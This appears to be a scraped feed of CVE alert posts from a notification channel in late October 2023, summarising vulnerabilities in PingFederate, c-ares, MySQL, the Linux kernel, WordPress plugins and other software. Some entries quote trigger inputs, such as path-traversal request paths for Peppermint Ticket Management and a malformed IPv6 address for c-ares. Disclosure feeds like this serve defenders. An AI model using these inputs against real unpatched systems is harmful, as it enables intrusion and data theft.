🚨 CVE-2023-39231PingFederate using the PingOne MFA adapter allows a new MFA device to be paired without requiring second factor authentication from an existing registered device. A threat actor may be able to exploit this vulnerability to register their own MFA device if they have knowledge of a victim user's first factor credentials.🎖@cveNotify |
|
| 2023-10-31 20:52:11 |
🚨 CVE-2023-39740The leakage of the client secret in Onigiriya-musubee Line 13.6.1 allows attackers to obtain the channel access token and send crafted broadcast messages.🎖@cveNotify |
|
| 2023-10-31 20:52:09 |
🚨 CVE-2023-39737The leakage of the client secret in Matsuya Line 13.6.1 allows attackers to obtain the channel access token and send crafted broadcast messages.🎖@cveNotify |
|
| 2023-10-31 20:52:06 |
🚨 CVE-2023-39736The leakage of the client secret in Fukunaga_memberscard Line 13.6.1 allows attackers to obtain the channel access token and send crafted broadcast messages.🎖@cveNotify |
|
| 2023-10-31 20:52:04 |
🚨 CVE-2023-39739The leakage of the client secret in REGINA SWEETS&BAKERY Line 13.6.1 allows attackers to obtain the channel access token and send crafted broadcast messages.🎖@cveNotify |
|
| 2023-10-31 20:52:02 |
🚨 CVE-2023-39732The leakage of the client secret in Tokueimaru_waiting Line 13.6.1 allows attackers to obtain the channel access token and send crafted broadcast messages.🎖@cveNotify |
|
| 2023-10-31 18:52:25 |
🚨 CVE-2023-31130c-ares is an asynchronous resolver library. ares_inet_net_pton() is vulnerable to a buffer underflow for certain ipv6 addresses, in particular "0::00:00:00/2" was found to cause an issue. C-ares only uses this function internally for configuration purposes which would require an administrator to configure such an address via ares_set_sortlist(). However, users may externally use ares_inet_net_pton() for other purposes and thus be vulnerable to more severe issues. This issue has been fixed in 1.19.1.🎖@cveNotify |
|
| 2023-10-31 18:52:22 |
🚨 CVE-2023-31147c-ares is an asynchronous resolver library. When /dev/urandom or RtlGenRandom() are unavailable, c-ares uses rand() to generate random numbers used for DNS query ids. This is not a CSPRNG, and it is also not seeded by srand() so will generate predictable output. Input from the random number generator is fed into a non-compilant RC4 implementation and may not be as strong as the original RC4 implementation. No attempt is made to look for modern OS-provided CSPRNGs like arc4random() that is widely available. This issue has been fixed in version 1.19.1.🎖@cveNotify |
|
| 2023-10-31 18:52:19 |
🚨 CVE-2023-32067c-ares is an asynchronous resolver library. c-ares is vulnerable to denial of service. If a target resolver sends a query, the attacker forges a malformed UDP packet with a length of 0 and returns them to the target resolver. The target resolver erroneously interprets the 0 length as a graceful shutdown of the connection. This issue has been patched in version 1.19.1.🎖@cveNotify |
|
| 2023-10-31 18:52:16 |
🚨 CVE-2023-31124c-ares is an asynchronous resolver library. When cross-compiling c-ares and using the autotools build system, CARES_RANDOM_FILE will not be set, as seen when cross compiling aarch64 android. This will downgrade to using rand() as a fallback which could allow an attacker to take advantage of the lack of entropy by not using a CSPRNG. This issue was patched in version 1.19.1.🎖@cveNotify |
|
| 2023-10-31 18:52:14 |
🚨 CVE-2014-0231The mod_cgid module in the Apache HTTP Server before 2.4.10 does not have a timeout mechanism, which allows remote attackers to cause a denial of service (process hang) via a request to a CGI script that does not read from its stdin file descriptor.🎖@cveNotify |
|
| 2023-10-31 17:22:07 |
🚨 CVE-2023-36085The sisqualWFM 7.1.319.103 thru 7.1.319.111 for Android, has a host header injection vulnerability in its "/sisqualIdentityServer/core/" endpoint. By modifying the HTTP Host header, an attacker can change webpage links and even redirect users to arbitrary or malicious locations. This can lead to phishing attacks, malware distribution, and unauthorized access to sensitive resources.🎖@cveNotify |
|
| 2023-10-31 17:22:04 |
🚨 CVE-2023-37283Under a very specific and highly unrecommended configuration, authentication bypass is possible in the PingFederate Identifier First Adapter🎖@cveNotify |
|
| 2023-10-31 17:22:01 |
🚨 CVE-2023-34447iTop is an open source, web-based IT service management platform. Prior to versions 3.0.4 and 3.1.0, on `pages/UI.php`, cross site scripting is possible. This issue is fixed in versions 3.0.4 and 3.1.0.🎖@cveNotify |
|
| 2023-10-31 17:21:58 |
🚨 CVE-2023-34085When an AWS DynamoDB table is used for user attribute storage, it is possible to retrieve the attributes of another user using a maliciously crafted request🎖@cveNotify |
|
| 2023-10-31 16:53:36 |
https://t.me/malwr |
|
| 2023-10-30 23:22:17 |
🚨 CVE-2023-43792baserCMS is a website development framework. In versions 4.6.0 through 4.7.6, there is a Code Injection vulnerability in the mail form of baserCMS. As of time of publication, no known patched versions are available.🎖@cveNotify |
|
| 2023-10-30 23:22:16 |
🚨 CVE-2023-5349A memory leak flaw was found in ruby-magick, an interface between Ruby and ImageMagick. This issue can lead to a denial of service (DOS) by memory exhaustion.🎖@cveNotify |
|
| 2023-10-30 23:22:14 |
🚨 CVE-2023-47090NATS nats-server before 2.9.23 and 2.10.x before 2.10.2 has an authentication bypass. An implicit $G user in an authorization block can sometimes be used for unauthenticated access, even when the intention of the configuration was for each user to have an account. The earliest affected version is 2.2.0.🎖@cveNotify |
|
| 2023-10-30 23:22:12 |
🚨 CVE-2023-0558The ContentStudio plugin for WordPress is vulnerable to authorization bypass due to an unsecure token check that is susceptible to type juggling in versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to execute functions intended for use by users with proper API keys.🎖@cveNotify |
|
| 2023-10-30 23:22:10 |
🚨 CVE-2021-4327A vulnerability was found in SerenityOS. It has been rated as critical. Affected by this issue is the function initialize_typed_array_from_array_buffer in the library Userland/Libraries/LibJS/Runtime/TypedArray.cpp. The manipulation leads to integer overflow. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The patch is identified as f6c6047e49f1517778f5565681fb64750b14bf60. It is recommended to apply a patch to fix this issue. VDB-222074 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-30 23:22:09 |
🚨 CVE-2023-46331WebAssembly wabt 1.0.33 has an Out-of-Bound Memory Read in in DataSegment::IsValidRange(), which lead to segmentation fault.🎖@cveNotify |
|
| 2023-10-30 23:22:06 |
🚨 CVE-2017-20183A vulnerability was found in External Media without Import Plugin up to 1.0.0 on WordPress. It has been declared as problematic. This vulnerability affects the function print_media_new_panel of the file external-media-without-import.php. The manipulation of the argument url/error/width/height/mime-type leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.0.1 is able to address this issue. The patch is identified as 9d2ecd159a6e2e3f710b4f1c28e2714f66502746. It is recommended to upgrade the affected component. VDB-227950 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-30 23:22:04 |
🚨 CVE-2023-2241A vulnerability, which was classified as critical, was found in PoDoFo 0.10.0. Affected is the function readXRefStreamEntry of the file PdfXRefStreamParserObject.cpp. The manipulation leads to heap-based buffer overflow. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The patch is identified as 535a786f124b739e3c857529cecc29e4eeb79778. It is recommended to apply a patch to fix this issue. VDB-227226 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-30 23:22:03 |
🚨 CVE-2018-25082A vulnerability was found in zwczou WeChat SDK Python 0.3.0 and classified as critical. This issue affects the function validate/to_xml. The manipulation leads to xml external entity reference. The attack may be initiated remotely. Upgrading to version 0.5.5 is able to address this issue. The patch is named e54abadc777715b6dcb545c13214d1dea63df6c9. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-223403.🎖@cveNotify |
|
| 2023-10-30 23:22:02 |
🚨 CVE-2021-4329A vulnerability, which was classified as critical, has been found in json-logic-js 2.0.0. Affected by this issue is some unknown functionality of the file logic.js. The manipulation leads to command injection. Upgrading to version 2.0.1 is able to address this issue. The patch is identified as c1dd82f5b15d8a553bb7a0cfa841ab8a11a9c227. It is recommended to upgrade the affected component. VDB-222266 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-30 23:22:00 |
🚨 CVE-2020-36665A vulnerability was found in Artesãos SEOTools up to 0.17.1 and classified as critical. This issue affects the function eachValue of the file TwitterCards.php. The manipulation of the argument value leads to open redirect. Upgrading to version 0.17.2 is able to address this issue. The identifier of the patch is ca27cd0edf917e0bc805227013859b8b5a1f01fb. It is recommended to upgrade the affected component. The identifier VDB-222233 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-30 21:22:46 |
🚨 CVE-2023-22048Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Pluggable Auth). Supported versions that are affected are 8.0.33 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N).🎖@cveNotify |
|
| 2023-10-30 21:22:38 |
🚨 CVE-2023-22046Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.33 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-10-30 21:22:35 |
🚨 CVE-2023-46332WebAssembly wabt 1.0.33 contains an Out-of-Bound Memory Write in DataSegment::Drop(), which lead to segmentation fault.🎖@cveNotify |
|
| 2023-10-30 21:22:30 |
🚨 CVE-2023-43872A File upload vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to upload a pdf file with hidden Cross Site Scripting (XSS).🎖@cveNotify |
|
| 2023-10-30 21:22:25 |
🚨 CVE-2023-38964Creative Item Academy LMS 6.0 was discovered to contain a cross-site scripting (XSS) vulnerability.🎖@cveNotify |
|
| 2023-10-30 21:22:23 |
🚨 CVE-2023-37635UVDesk Community Skeleton v1.1.1 allows unauthenticated attackers to perform brute force attacks on the login page to gain access to the application.🎖@cveNotify |
|
| 2023-10-30 21:22:15 |
🚨 CVE-2023-24018A stack-based buffer overflow vulnerability exists in the libzebra.so.0.0.0 security_decrypt_password functionality of Milesight UR32L v32.3.0.5. A specially crafted HTTP request can lead to a buffer overflow. An authenticated attacker can send an HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-10-30 21:22:09 |
🚨 CVE-2023-25097Multiple buffer overflow vulnerabilities exist in the vtysh_ubus binary of Milesight UR32L v32.3.0.5 due to the use of an unsafe sprintf pattern. A specially crafted HTTP request can lead to arbitrary code execution. An attacker with high privileges can send HTTP requests to trigger these vulnerabilities.This buffer overflow occurs in the set_qos function with the attach_class variable.🎖@cveNotify |
|
| 2023-10-30 21:22:04 |
🚨 CVE-2023-23842The SolarWinds Network Configuration Manager was susceptible to the Directory Traversal Vulnerability. This vulnerability allows users with administrative access to SolarWinds Web Console to execute arbitrary commands.🎖@cveNotify |
|
| 2023-10-30 21:22:01 |
🚨 CVE-2023-33229The SolarWinds Platform was susceptible to the Incorrect Input Neutralization Vulnerability. This vulnerability allows a remote adversary with a valid SolarWinds Platform account to append URL parameters to inject passive HTML.🎖@cveNotify |
|
| 2023-10-30 16:53:36 |
🚨 CVE-2021-46898views/switch.py in django-grappelli (aka Django Grappelli) before 2.15.2 attempts to prevent external redirection with startswith("/") but this does not consider a protocol-relative URL (e.g., //example.com) attack.🎖@cveNotify |
|
| 2023-10-30 16:53:31 |
🚨 CVE-2023-46449Sourcecodester Free and Open Source inventory management system v1.0 is vulnerable to Incorrect Access Control. An arbitrary user can change the password of another user and takeover the account via IDOR in the password change function.🎖@cveNotify |
|
| 2023-10-30 16:53:29 |
🚨 CVE-2023-46450Sourcecodester Free and Open Source inventory management system 1.0 is vulnerable to Cross Site Scripting (XSS) via the Add supplier function.🎖@cveNotify |
|
| 2023-10-30 16:53:26 |
🚨 CVE-2023-45822Artifact Hub is a web-based application that enables finding, installing, and publishing packages and configurations for CNCF projects. During a security audit of Artifact Hub's code base a security researcher identified a bug in which a default unsafe rego built-in was allowed to be used when defining authorization policies. Artifact Hub includes a fine-grained authorization mechanism that allows organizations to define what actions can be performed by their members. It is based on customizable authorization policies that are enforced by the `Open Policy Agent`. Policies are written using `rego` and their data files are expected to be json documents. By default, `rego` allows policies to make HTTP requests, which can be abused to send requests to internal resources and forward the responses to an external entity. In the context of Artifact Hub, this capability should have been disabled. This issue has been resolved in version `1.16.0`. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-10-30 16:53:24 |
🚨 CVE-2023-45823Artifact Hub is a web-based application that enables finding, installing, and publishing packages and configurations for CNCF projects. During a security audit of Artifact Hub's code base a security researcher identified a bug in which by using symbolic links in certain kinds of repositories loaded into Artifact Hub, it was possible to read internal files. Artifact Hub indexes content from a variety of sources, including git repositories. When processing git based repositories, Artifact Hub clones the repository and, depending on the artifact kind, reads some files from it. During this process, in some cases, no validation was done to check if the file was a symbolic link. This made possible to read arbitrary files in the system, potentially leaking sensitive information. This issue has been resolved in version `1.16.0`. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-10-30 16:53:22 |
🚨 CVE-2023-43341Cross-site scripting (XSS) vulnerability in evolution evo v.3.2.3 allows a local attacker to execute arbitrary code via a crafted payload injected uid parameter.🎖@cveNotify |
|
| 2023-10-30 16:53:18 |
🚨 CVE-2023-43342Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Languages Menu component.🎖@cveNotify |
|
| 2023-10-30 16:53:15 |
🚨 CVE-2023-43344Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the SEO - Meta description parameter in the Pages Menu component.🎖@cveNotify |
|
| 2023-10-30 16:53:12 |
🚨 CVE-2023-43359Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Page Specific Metadata and Smarty data parameters in the Content Manager Menu component.🎖@cveNotify |
|
| 2023-10-30 16:53:09 |
🚨 CVE-2023-43875Multiple Cross-Site Scripting (XSS) vulnerabilities in installation of Subrion CMS v.4.2.1 allows a local attacker to execute arbitrary web scripts via a crafted payload injected into the dbhost, dbname, dbuser, adminusername and adminemail.🎖@cveNotify |
|
| 2023-10-30 16:53:06 |
🚨 CVE-2023-45815ArchiveBox is an open source self-hosted web archiving system. Any users who are using the `wget` extractor and view the content it outputs. The impact is potentially severe if you are logged in to the ArchiveBox admin site in the same browser session and view an archived malicious page designed to target your ArchiveBox instance. Malicious Javascript could potentially act using your logged-in admin credentials and add/remove/modify snapshots, add/remove/modify ArchiveBox users, and generally do anything an admin user could do. The impact is less severe for non-logged-in users, as malicious Javascript cannot *modify* any archives, but it can still *read* all the other archived content by fetching the snapshot index and iterating through it. Because all of ArchiveBox's archived content is served from the same host and port as the admin panel, when archived pages are viewed the JS executes in the same context as all the other archived pages (and the admin panel), defeating most of the browser's usual CORS/CSRF security protections and leading to this issue. A patch is being developed in https://github.com/ArchiveBox/ArchiveBox/issues/239. As a mitigation for this issue would be to disable the wget extractor by setting `archivebox config --set SAVE_WGET=False`, ensure you are always logged out, or serve only a [static HTML version](https://github.com/ArchiveBox/ArchiveBox/wiki/Publishing-Your-Archive#2-export-and-host-it-as-static-html) of your archive.🎖@cveNotify |
|
| 2023-10-30 16:53:03 |
🚨 CVE-2023-45394Stored Cross-Site Scripting (XSS) vulnerability in the Company field in the "Request a Quote" Section of Small CRM v3.0 allows an attacker to store and execute malicious javascript code in the Admin panel which leads to Admin account takeover.🎖@cveNotify |
|
| 2023-10-30 16:53:00 |
🚨 CVE-2023-45471The QAD Search Server is vulnerable to Stored Cross-Site Scripting (XSS) in versions up to, and including, 1.0.0.315 due to insufficient checks on indexes. This makes it possible for unauthenticated attackers to create a new index and inject a malicious web script into its name, that will execute whenever a user accesses the search page.🎖@cveNotify |
|
| 2023-10-30 16:52:56 |
🚨 CVE-2022-48189An SMM driver input validation vulnerability in the BIOS of some ThinkPad models could allow an attacker with local access and elevated privileges to execute arbitrary code.🎖@cveNotify |
|
| 2023-10-30 16:52:52 |
🚨 CVE-2022-4573An SMI handler input validation vulnerability in the ThinkPad X1 Fold Gen 1 could allow an attacker with local access and elevated privileges to execute arbitrary code.🎖@cveNotify |
|
| 2023-10-30 16:52:49 |
🚨 CVE-2022-4574An SMI handler input validation vulnerability in the BIOS of some ThinkPad models could allow an attacker with local access and elevated privileges to execute arbitrary code.🎖@cveNotify |
|
| 2023-10-30 16:52:46 |
🚨 CVE-2022-4575A vulnerability due to improper write protection of UEFI variables was reported in the BIOS of some ThinkPad models could allow an attacker with physical or local access and elevated privileges the ability to bypass Secure Boot.🎖@cveNotify |
|
| 2023-10-30 16:52:44 |
🚨 CVE-2023-44323Adobe Acrobat for Edge version 118.0.2088.46 (and earlier) is affected by a Use After Free vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-10-30 16:52:42 |
🚨 CVE-2023-4964Potential open redirect vulnerabilityin opentext Service Management Automation X(SMAX) versions 2020.05, 2020.08,2020.11, 2021.02, 2021.05, 2021.08, 2021.11, 2022.05, 2022.11 and opentext AssetManagement X (AMX) versions 2021.08, 2021.11, 2022.05, 2022.11. Thevulnerability could allow attackers to redirect a user tomalicious websites.🎖@cveNotify |
|
| 2023-10-30 16:52:37 |
🚨 CVE-2023-34051VMware Aria Operations for Logs contains an authentication bypass vulnerability. An unauthenticated, malicious actor can inject files into the operating system of an impacted appliance which can result in remote code execution.🎖@cveNotify |
|
| 2023-10-30 13:22:27 |
🚨 CVE-2023-42431Cross-site Scripting (XSS) vulnerability in BlueSpiceAvatars extension of BlueSpice allows logged in user to inject arbitrary HTML into the profile image dialog on Special:Preferences. This only applies to the genuine user context.🎖@cveNotify |
|
| 2023-10-30 13:22:25 |
🚨 CVE-2023-5844Unverified Password Change in GitHub repository pimcore/admin-ui-classic-bundle prior to 1.2.0.🎖@cveNotify |
|
| 2023-10-30 13:22:23 |
🚨 CVE-2023-45746Cross-site scripting vulnerability in Movable Type series allows a remote authenticated attacker to inject an arbitrary script. Affected products/versions are as follows: Movable Type 7 r.5405 and earlier (Movable Type 7 Series), Movable Type Advanced 7 r.5405 and earlier (Movable Type 7 Series), Movable Type Premium 1.58 and earlier, Movable Type Premium Advanced 1.58 and earlier, Movable Type Cloud Edition (Version 7) r.5405 and earlier, and Movable Type Premium Cloud Edition 1.58 and earlier.🎖@cveNotify |
|
| 2023-10-30 13:22:22 |
🚨 CVE-2023-45797 A Buffer overflow vulnerability in DreamSecurity MagicLine4NX versions 1.0.0.1 to 1.0.0.26 allows an attacker to remotely execute code.🎖@cveNotify |
|
| 2023-10-30 13:22:19 |
🚨 CVE-2023-45798In Yettiesoft VestCert versions 2.36 to 2.5.29, a vulnerability exists due to improper validation of third-party modules. This allows malicious actors to load arbitrary third-party modules, leading to remote code execution.🎖@cveNotify |
|
| 2023-10-30 13:22:18 |
🚨 CVE-2023-45799In MLSoft TCO!stream versions 8.0.22.1115 and below, a vulnerability exists due to insufficient permission validation. This allows an attacker to make the victim download and execute arbitrary files.🎖@cveNotify |
|
| 2023-10-30 13:22:16 |
🚨 CVE-2023-46863Peppermint Ticket Management before 0.2.4 allows remote attackers to read arbitrary files via a /api/v1/users/file/download?filepath=./../ POST request.🎖@cveNotify |
|
| 2023-10-30 13:22:14 |
🚨 CVE-2023-46864Peppermint Ticket Management through 0.2.4 allows remote attackers to read arbitrary files via a /api/v1/ticket/1/file/download?filepath=../ POST request.🎖@cveNotify |
|
| 2023-10-30 13:22:12 |
🚨 CVE-2023-4393HTML and SMTP injections on the registration page of LiquidFiles versions 3.7.13 and below, allow an attacker to perform more advanced phishing attacks against an organization.🎖@cveNotify |
|
| 2023-10-30 13:22:10 |
🚨 CVE-2023-46865/api/v1/company/upload-logo in CompanyController.php in crater through 6.0.6 allows a superadmin to execute arbitrary PHP code by placing this code into an image/png IDAT chunk of a Company Logo image.🎖@cveNotify |
|
| 2023-10-30 13:22:08 |
🚨 CVE-2023-5842Cross-site Scripting (XSS) - Stored in GitHub repository dolibarr/dolibarr prior to 16.0.5.🎖@cveNotify |
|
| 2023-10-30 13:22:06 |
🚨 CVE-2021-25736Kube-proxy on Windows can unintentionally forward traffic to local processes listening on the same port (“spec.ports[*].port”) as a LoadBalancer Service when the LoadBalancer controller does not set the “status.loadBalancer.ingress[].ip” field. Clusters where the LoadBalancer controller sets the “status.loadBalancer.ingress[].ip” field are unaffected.🎖@cveNotify |
|
| 2023-10-30 13:22:04 |
🚨 CVE-2023-46866In International Color Consortium DemoIccMAX 79ecb74, CIccCLUT::Interp3d in IccProfLib/IccTagLut.cpp in libSampleICC.a attempts to access array elements at out-of-bounds indexes.🎖@cveNotify |
|
| 2023-10-30 13:22:02 |
🚨 CVE-2023-46867In International Color Consortium DemoIccMAX 79ecb74, CIccXformMatrixTRC::GetCurve in IccCmm.cpp in libSampleICC.a has a NULL pointer dereference.🎖@cveNotify |
|
| 2023-10-30 13:22:00 |
🚨 CVE-2023-44141Inkdrop prior to v5.6.0 allows a local attacker to conduct a code injection attack by having a legitimate user open a specially crafted markdown file.🎖@cveNotify |
|
| 2023-10-29 17:22:05 |
🚨 CVE-2005-10002A vulnerability, which was classified as critical, was found in almosteffortless secure-files Plugin up to 1.1 on WordPress. Affected is the function sf_downloads of the file secure-files.php. The manipulation of the argument downloadfile leads to path traversal. Upgrading to version 1.2 is able to address this issue. The name of the patch is cab025e5fc2bcdad8032d833ebc38e6bd2a13c92. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-243804.🎖@cveNotify |
|
| 2023-10-29 10:52:25 |
🚨 CVE-2021-33634iSulad uses the lcr+lxc runtime (default) to run malicious images, which can cause DOS.🎖@cveNotify |
|
| 2023-10-29 10:52:23 |
🚨 CVE-2021-33635When malicious images are pulled by isula pull, attackers can execute arbitrary code.🎖@cveNotify |
|
| 2023-10-29 10:52:21 |
🚨 CVE-2021-33636When the isula load command is used to load malicious images, attackers can execute arbitrary code.🎖@cveNotify |
|
| 2023-10-29 10:52:18 |
🚨 CVE-2021-33637When the isula export command is used to export a container to an image and the container is controlled by an attacker, the attacker can escape the container.🎖@cveNotify |
|
| 2023-10-29 10:52:16 |
🚨 CVE-2021-33638When the isula cp command is used to copy files from a container to a host machine and the container is controlled by an attacker, the attacker can escape the container.🎖@cveNotify |
|
| 2023-10-29 10:52:14 |
🚨 CVE-2023-5682A vulnerability has been found in Tongda OA 2017 and classified as critical. This vulnerability affects unknown code of the file general/hr/training/record/delete.php. The manipulation of the argument RECORD_ID leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-243058 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-10-29 10:52:12 |
🚨 CVE-2023-46234browserify-sign is a package to duplicate the functionality of node's crypto public key functions, much of this is based on Fedor Indutny's work on indutny/tls.js. An upper bound check issue in `dsaVerify` function allows an attacker to construct signatures that can be successfully verified by any public key, thus leading to a signature forgery attack. All places in this project that involve DSA verification of user-input signatures will be affected by this vulnerability. This issue has been patched in version 4.2.2.🎖@cveNotify |
|
| 2023-10-29 06:23:13 |
🚨 CVE-2022-4859A vulnerability, which was classified as problematic, has been found in Joget up to 7.0.33. This issue affects the function submitForm of the file wflow-core/src/main/java/org/joget/plugin/enterprise/UserProfileMenu.java of the component User Profile Menu. The manipulation of the argument firstName/lastName leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 7.0.34 is able to address this issue. The patch is named 9a77f508a2bf8cf661d588f37a4cc29ecaea4fc8. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217055.🎖@cveNotify |
|
| 2023-10-29 06:23:10 |
🚨 CVE-2022-4860A vulnerability was found in KBase Metrics. It has been classified as critical. This affects the function upload_user_data of the file source/daily_cron_jobs/methods_upload_user_stats.py. The manipulation leads to sql injection. The patch is named 959dfb6b05991e30b0fa972a1ecdcaae8e1dae6d. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217059.🎖@cveNotify |
|
| 2023-10-29 06:23:07 |
🚨 CVE-2022-4876A vulnerability was found in Kaltura mwEmbed up to 2.96.rc1 and classified as problematic. This issue affects some unknown processing of the file includes/DefaultSettings.php. The manipulation of the argument HTTP_X_FORWARDED_HOST leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 2.96.rc2 is able to address this issue. The patch is named 13b8812ebc8c9fa034eed91ab35ba8423a528c0b. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217427.🎖@cveNotify |
|
| 2023-10-29 06:23:05 |
🚨 CVE-2022-4875A vulnerability has been found in fossology and classified as problematic. This vulnerability affects unknown code. The manipulation of the argument sql/VarValue leads to cross site scripting. The attack can be initiated remotely. The patch is identified as 8e0eba001662c7eb35f045b70dd458a4643b4553. It is recommended to apply a patch to fix this issue. VDB-217426 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-29 06:23:02 |
🚨 CVE-2022-4871A vulnerability classified as problematic was found in ummmmm nflpick-em.com up to 2.2.x. This vulnerability affects the function _Load_Users of the file html/includes/runtime/admin/JSON/LoadUsers.php. The manipulation of the argument sort leads to sql injection. The attack can be initiated remotely. The patch is identified as dd77a35942f527ea0beef5e0ec62b92e8b93211e. It is recommended to apply a patch to fix this issue. VDB-217270 is the identifier assigned to this vulnerability. NOTE: JSON entrypoint is only accessible via an admin account🎖@cveNotify |
|
| 2023-10-29 06:23:00 |
🚨 CVE-2022-4879A vulnerability was found in Forged Alliance Forever up to 3746. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Vote Handler. The manipulation leads to improper authorization. Upgrading to version 3747 is able to address this issue. The patch is named 6880971bd3d73d942384aff62d53058c206ce644. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217555.🎖@cveNotify |
|
| 2023-10-29 06:22:57 |
🚨 CVE-2022-4869A vulnerability was found in Evolution Events Artaxerxes. It has been declared as problematic. This vulnerability affects unknown code of the file arta/common/middleware.py of the component POST Parameter Handler. The manipulation of the argument password leads to information disclosure. The attack can be initiated remotely. The patch is identified as 022111407d34815c16c6eada2de69ca34084dc0d. It is recommended to apply a patch to fix this issue. VDB-217438 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-29 06:22:53 |
🚨 CVE-2022-4881A vulnerability was found in CapsAdmin PAC3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file lua/pac3/core/shared/http.lua. The manipulation of the argument url leads to cross site scripting. The attack may be launched remotely. The patch is identified as 8fc9e12dfa21d757be6eb4194c763e848b299ac0. It is recommended to apply a patch to fix this issue. VDB-217646 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-29 06:22:50 |
🚨 CVE-2022-4880A vulnerability was found in stakira OpenUtau. It has been classified as critical. This affects the function VoicebankInstaller of the file OpenUtau.Core/Classic/VoicebankInstaller.cs of the component ZIP Archive Handler. The manipulation leads to path traversal. Upgrading to version 0.0.991 is able to address this issue. The identifier of the patch is 849a0a6912aac8b1c28cc32aa1132a3140caff4a. It is recommended to upgrade the affected component. The identifier VDB-217617 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-29 06:22:48 |
🚨 CVE-2023-42753An array indexing vulnerability was found in the netfilter subsystem of the Linux kernel. A missing macro could lead to a miscalculation of the `h->nets` array offset, providing attackers with the primitive to arbitrarily increment/decrement a memory buffer out-of-bound. This issue may allow a local user to crash the system or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2023-10-29 06:22:45 |
🚨 CVE-2023-4244A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.Due to a race condition between nf_tables netlink control plane transaction and nft_set element garbage collection, it is possible to underflow the reference counter causing a use-after-free vulnerability.We recommend upgrading past commit 3e91b0ebd994635df2346353322ac51ce84ce6d8.🎖@cveNotify |
|
| 2023-10-29 06:22:41 |
🚨 CVE-2023-4622A use-after-free vulnerability in the Linux kernel's af_unix component can be exploited to achieve local privilege escalation.The unix_stream_sendpage() function tries to add data to the last skb in the peer's recv queue without locking the queue. Thus there is a race where unix_stream_sendpage() could access an skb locklessly that is being released by garbage collection, resulting in use-after-free.We recommend upgrading past commit 790c2f9d15b594350ae9bca7b236f2b1859de02c.🎖@cveNotify |
|
| 2023-10-29 06:22:39 |
🚨 CVE-2023-3772A flaw was found in the Linux kernel’s IP framework for transforming packets (XFRM subsystem). This issue may allow a malicious user with CAP_NET_ADMIN privileges to directly dereference a NULL pointer in xfrm_update_ae_params(), leading to a possible kernel crash and denial of service.🎖@cveNotify |
|
| 2023-10-29 06:22:36 |
🚨 CVE-2023-3773A flaw was found in the Linux kernel’s IP framework for transforming packets (XFRM subsystem). This issue may allow a malicious user with CAP_NET_ADMIN privileges to cause a 4 byte out-of-bounds read of XFRMA_MTIMER_THRESH when parsing netlink attributes, leading to potential leakage of sensitive heap data to userspace.🎖@cveNotify |
|
| 2023-10-29 06:22:34 |
🚨 CVE-2023-34319The fix for XSA-423 added logic to Linux'es netback driver to deal witha frontend splitting a packet in a way such that not all of the headerswould come in one piece. Unfortunately the logic introduced theredidn't account for the extreme case of the entire packet being splitinto as many pieces as permitted by the protocol, yet still beingsmaller than the area that's specially dealt with to keep all (possible)headers together. Such an unusual packet would therefore trigger abuffer overrun in the driver.🎖@cveNotify |
|
| 2023-10-29 06:22:31 |
🚨 CVE-2023-35824An issue was discovered in the Linux kernel before 6.3.2. A use-after-free was found in dm1105_remove in drivers/media/pci/dm1105/dm1105.c.🎖@cveNotify |
|
